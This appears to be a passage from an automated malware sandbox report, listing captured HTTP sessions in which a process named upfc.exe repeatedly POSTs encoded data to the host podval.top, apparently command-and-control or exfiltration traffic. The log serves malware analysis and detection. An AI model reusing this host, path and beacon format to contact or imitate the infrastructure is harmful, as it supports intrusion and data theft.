                                                    Jul 3, 2024 16:43:13.042480946 CEST | 1060 | OUT | Data Raw: 5f 56 5f 5a 5b 5e 57 51 58 56 55 51 50 5d 59 56 55 5e 5e 5a 51 55 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_Z[^WQXVUQP]YVU^^ZQUSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y%)3$9\%3;]).)T#9==Z0:'4/.727/"['$Y 5
                                                    Jul 3, 2024 16:43:13.147202015 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:13.493649006 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gqiXbsLOqd%2By2wDZYQLAnRtoKwRV3V%2BTqC5%2FQNup0RkrKIaTTHBYtVmI0OzLKt9%2BjDXK1W%2BRKbKnsF7jAA8J7pr2rgalBXomP76VblAroWbfZjATiGKraRb9Tdgl"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a586ea754283-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    83 | 192.168.2.10 | 49801 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:13.635381937 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:13.994719982 CEST | 1056 | OUT | Data Raw: 5a 50 5f 5e 5b 57 52 5a 58 56 55 51 50 59 59 52 55 5e 5e 55 51 5b 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZP_^[WRZXVUQPYYRU^^UQ[SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&_;&*#3V;(-2 =..0C6%33,. 4#;<"['$Y !
                                                    Jul 3, 2024 16:43:14.097179890 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:14.301501036 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HT6dIAEujcKo9ni%2FxYnNtJ3ji%2B80VopqCErThAdbTZuNHyW0wtpApc8eVvNnBn2JCehAFGzHYzMkZl7Rn3R0IqRG5yozq0UT6AtO5z5ijVU9EpuKJp8uIlS%2FTkYc"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a58ccca6426d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    84 | 192.168.2.10 | 49802 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:14.443526983 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:14.791599989 CEST | 1060 | OUT | Data Raw: 5f 55 5f 5d 5e 5f 57 5f 58 56 55 51 50 5c 59 56 55 5e 5e 5a 51 58 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_]^_W_XVUQP\YVU^^ZQXSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\%9/&*?$0+](>: .!,==Y'"'3R,4#"7-<"['$Y 1
                                                    Jul 3, 2024 16:43:14.908571959 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:15.255477905 CEST | 586 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqjGoHW99jXWn%2F6zEjdrTuJXbSq3sP2qUyNTH2ryKc%2F4QFXYcHyayivx%2BXrJff%2FekkJDlU%2F4eANJzHWdd4SokTFz1BJuX6mYyB9JhgnEQfwqgKSA%2BCa0LaGaQ8Zk"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a591efe319eb-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    85 | 192.168.2.10 | 49803 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:15.420603037 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:15.775877953 CEST | 1060 | OUT | Data Raw: 5f 57 5a 5c 5e 5a 57 5a 58 56 55 51 50 5e 59 50 55 58 5e 58 51 5f 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _WZ\^ZWZXVUQP^YPUX^XQ_S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z1038'3;[*" >=9>.35*$ 7S;8#4;"['$Y
                                                    Jul 3, 2024 16:43:15.866590977 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:16.224643946 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wD5Y7ajavXgkmcEzTe143JWJyhjo5in4H9B6AkpnyEpXTA7xBI93dBSk%2BUaVDf7BLUckgO%2BBQGuNjip1SRTyttyZTU14%2BxFRhpEH0qmpf5dN5%2BE9H7Yw97brH4Xb"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a597ef708c8f-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    86 | 192.168.2.10 | 49804 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:16.386534929 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    87 | 192.168.2.10 | 49805 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:16.579525948 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:16.932291031 CEST | 1772 | OUT | Data Raw: 5f 5b 5a 58 5e 58 52 5f 58 56 55 51 50 5d 59 57 55 50 5e 54 51 5d 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[ZX^XR_XVUQP]YWUP^TQ]SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z%:$097$3'\=.9R75\9-6'%)\''-. ?8"['$Y 5
                                                    Jul 3, 2024 16:43:17.046717882 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:17.420027018 CEST | 728 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:17 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d0QTR%2FN4AZ8eDx6VKegIbsyFyaz2kUn7R3AKPPi3cQdfwJapKqd%2BtJv7681YodJbC14IL%2BJMEL8JvWUjUZOlkK398pZGt8BoQPGZMnq8OEEc%2FJ2rcA%2FKIjkUga7S"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a59f3a7a19aa-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 07 31 14 25 1e 25 0c 2c 0b 2e 2e 20 0f 3c 3e 38 5c 2d 29 2d 5b 3c 42 21 1e 2c 2d 21 08 20 29 21 06 3f 3f 2c 15 25 30 23 0e 36 31 20 5b 04 1c 20 00 3f 3a 2d 5b 29 38 27 52 25 12 35 05 30 34 25 11 24 5d 31 0e 33 5e 23 11 28 2b 22 0f 27 1c 27 10 3e 28 39 06 3c 37 07 00 21 1e 21 54 02 13 22 1f 30 3d 1c 0f 34 23 28 0b 31 56 39 5d 30 1d 3b 1b 25 33 32 1d 3e 0a 2a 57 27 08 3c 5c 35 06 3b 54 27 16 08 5b 24 2d 0b 5d 22 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a
                                                    Data Ascii: 98&1%%,.. <>8\-)-[<B!,-! )!??,%0#61 [ ?:-[)8'R%504%$]13^#(+"''>(9<7!!T"0=4#(1V9]0;%32>*W'<\5;T'[$-]"(#_+)V3YT
                                                    Jul 3, 2024 16:43:17.510787964 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0
                                                    Jul 3, 2024 16:43:17.514166117 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:17.612626076 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:17.612823009 CEST | 1060 | OUT | Data Raw: 5f 5b 5a 5e 5e 5f 52 5b 58 56 55 51 50 5b 59 5a 55 5b 5e 59 51 5f 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[Z^^_R[XVUQP[YZU[^YQ_S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]':?'*803<(-% -]--935Y$##V/=' ',<"['$Y -
                                                    Jul 3, 2024 16:43:17.912786007 CEST | 581 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:17 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8nJYAJMuyM%2F1IstOpPCdq5EO5Se3NbusLkjINu4MA7lKSCbFr8oD4rIfeDI4gZKof%2Fi%2FYPgU6XO%2FdpigzujZ0qKZstn%2F19Sqb6k6%2BdqQ3rNAD2N1nfZDTur7bN71"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5a2cd5a19aa-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:18.057023048 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    88 | 192.168.2.10 | 49806 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:16.708558083 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:17.057207108 CEST | 1060 | OUT | Data Raw: 5a 55 5f 5d 5b 56 52 5b 58 56 55 51 50 5c 59 56 55 5e 5e 5d 51 5e 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU_][VR[XVUQP\YVU^^]Q^SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y1:30_7]$ ((>! )Y9.-0%' (;>$ ?-<"['$Y 1
                                                    Jul 3, 2024 16:43:17.174099922 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:17.386924982 CEST | 586 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:17 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpa9aUJkM4AN%2FUYz7aj2K4hqYipPtyfG5YLBkYtgGfC21bUI2QllfdpZVHECrVVrVgwTxxqesXi8tukLk%2BNkYvuMt0DerBRDLRhfn%2F94R7V%2FVZF7%2BoKD0%2BQeZrHF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5a00e7180d9-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    89 | 192.168.2.10 | 49807 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:18.189326048 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:18.541557074 CEST | 1060 | OUT | Data Raw: 5f 5a 5a 5e 5b 5b 57 5d 58 56 55 51 50 5b 59 56 55 50 5e 54 51 5b 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZ^[[W]XVUQP[YVUP^TQ[SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y'*/3*'37_>%S [9>"$&=]003S-.< 20Y-,"['$Y -
                                                    Jul 3, 2024 16:43:18.828319073 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:19.161552906 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7wZWriVHMtjt6C3R39Q3F21WWHqJCRDVl0eTa37P58dMRc4BLqbCQcrdSYn%2F6cW9ENWjKCLgBwiCjRejN1BZrsXjO2xG6D3kWvY6jqAgp8f0Cd7hKTEioOaxehr%2B"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5aa4e154373-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    90 | 192.168.2.10 | 49808 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:19.295015097 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:19.651679993 CEST | 1060 | OUT | Data Raw: 5f 57 5f 54 5b 57 57 59 58 56 55 51 50 50 59 52 55 5d 5e 5c 51 5f 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _W_T[WWYXVUQPPYRU]^\Q_S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2;'9 $V'Z=17[%\,>.0!Z0#'S->;Z414Z/,"['$Y
                                                    Jul 3, 2024 16:43:19.751260042 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:20.081841946 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:20 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FQNa9dHtxEw5UZYOeX7BKss1iIlx%2B95JRZvkGMJIopLHylYDxgPNcUvGgR3xLWQPdz2BbTawIfkfBZ4lCSwv58p%2FZhv8DlDvZ7O%2BMQnpNluWvH3kQM9VoEbVInsH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5b02a3d41ec-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    91 | 192.168.2.10 | 49809 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:20.220547915 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:20.573498011 CEST | 1060 | OUT | Data Raw: 5f 54 5f 5a 5b 56 57 5f 58 56 55 51 50 5d 59 54 55 59 5e 58 51 59 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_Z[VW_XVUQP]YTUY^XQYSZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X&_<D':<3V+(=&#[&.$)\' +U,X'_# Z,<"['$Y 5
                                                    Jul 3, 2024 16:43:20.693593979 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:21.076052904 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7yWo1hTUxh4PDdTR9FKbWl3w7yOx2L35tCj7jfihgayemQVa1DyOYlql2vWh1xpdkhc6GfJOkEHf%2FVZmTiD1ZCJRtlQyqZAWmtAamCUNE2IgXv0MGMhNo2jz3du%2F"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5b609ab8c21-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    92 | 192.168.2.10 | 49810 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:21.228593111 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
